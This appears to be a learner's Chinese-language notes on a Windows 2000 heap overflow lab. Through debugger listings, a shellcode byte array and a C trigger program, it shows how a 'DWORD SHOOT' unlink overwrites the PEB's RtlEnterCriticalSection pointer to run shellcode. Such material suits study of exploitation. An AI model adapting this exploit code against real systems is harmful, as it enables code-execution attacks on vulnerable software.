我知道原理了:
当
int remove()
{
node->blink->flink = node->flink;
//这个是flink x88x06x36x00 这个是blink //x20xf0xfdx7f";
//将系统RtlEnterCritucalSection 的 flink指向 我们的shellcode起始地址 造成DWORD SHOOT
node->flink->blink = node->blink;
//这里看到是二次 DWORD SHOOT 但此次 影响不大
}
DWORD SHOOT 目标是 0x7ffdf020 处的 RtlEnterCriticalSection 函数指针,指向shellcode起始地址
DWORD SHOOT 完毕后,堆溢出导致异常,最终导致调用ExitProcess 结束进程
ExitProcess 在结束进程时需要调用 临界区函数来同步线程,但却从 P.E.B 中拿出了指向shellcode的指针,因此 shellcode被执行
77F89103 > 64:8B0D 1800000>mov ecx,dword ptr fs:[0x18] RtlEnterCriticalSection 77F89134 > 8B5424 04 mov edx,dword ptr ss:[esp+0x4] RtlLeaveCriticalSection 004013A5 > 64:A1 3000000>mov eax,dword ptr fs:[0x30] 004013AB 8B40 20 mov eax,dword ptr ds:[eax+0x20] ; ntdll.RtlEnterCriticalSection 004013A5 > 64:A1 3000000>mov eax,dword ptr fs:[0x30] 004013AB 8B40 24 mov eax,dword ptr ds:[eax+0x24] ; ntdll.RtlLeaveCriticalSection ExitProcess 77E6E01A > 55 push ebp 77E6E01B 8BEC mov ebp,esp 77E6E01D 6A FF push -0x1 77E6E01F 68 A0E0E677 push KERNEL32.77E6E0A0 77E6E024 68 B4F0E777 push KERNEL32.77E7F0B4 77E6E029 64:A1 00000000 mov eax,dword ptr fs:[0] 77E6E02F 50 push eax 77E6E030 64:8925 0000000>mov dword ptr fs:[0],esp 77E6E037 51 push ecx 77E6E038 51 push ecx 77E6E039 81EC 98000000 sub esp,0x98 77E6E03F 53 push ebx 77E6E040 56 push esi 77E6E041 57 push edi 77E6E042 803D 0800EC77 0>cmp byte ptr ds:[0x77EC0008],0x0 77E6E049 0F85 5CAD0200 jnz KERNEL32.77E98DAB 77E6E04F FF15 A010E677 call dword ptr ds:[<&NTDLL.RtlAcquirePeb>; ntdll.RtlAcquirePebLock 77F8C258 > 64:A1 18000000 mov eax,dword ptr fs:[0x18] //teb 77F8C25E 8B40 30 mov eax,dword ptr ds:[eax+0x30]//peb 77F8C261 FF70 1C push dword ptr ds:[eax+0x1C] 77F8C264 FF50 20 call dword ptr ds:[eax+0x20] // 调用shellcode //本来调用的是 77F89103 RtlEnterCriticalSection
DWORD SHOOT 利用申请内存 造成 “掉包” 内存的指向 实现 将指定跳转 跳转到我们指定的shellcode处
2000 下
char shellcode[]=
"x90x90x90x90x90x90x90x90"
"x90x90x90x90"
//repaire the pointer which shooted by heap over run
"xB8x20xF0xFDx7F" //MOV EAX,7FFDF020
"xBBx03x91xF8x77" //MOV EBX,77F8AA4C the address here may releated to your OS
"x89x18" //MOV DWORD PTR DS:[EAX],EBX
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50"
"x53xFFx57xFCx53xFFx57xF8x90x90x90x90x90x90x90x90"
"x16x01x1Ax00x00x10x00x00"// head of the ajacent free block
"x88x06x36x00x20xf0xfdx7f";//需要重新查看,7ffdf020 只是存放有 RtlEnterCriticalSection 的地址,修改这个值
//0x00520688 is the address of shellcode in first heap block, you have to make sure this address via debug
//0x7ffdf020 is the position in PEB which hold a pointer to RtlEnterCriticalSection()
//and will be called by ExitProcess() at last
main()
{
HLOCAL h1 = 0, h2 = 0;
HANDLE hp;
hp = HeapCreate(0,0x1000,0x10000);
h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);
//__asm int 3 //used to break the process
//memcpy(h1,shellcode,200); //normal cpy, used to watch the heap
memcpy(h1,shellcode,0x200); //overflow,0x200=512
h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
return 0;
}这里利用 DWORD SHOOT 覆盖SEH 也就是 新申请内存时
node->bilink->flink = node->flink;
在内存中 显示:
flink 4字节 blink 4字节
! ! ! ! ! ! ! !
我们的shellcode起始 SEH地址
将SEH 指向 我们的shellcode
但还是不成功啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
不知道为什么 不成功
擦·我看到好像只有2000才能成功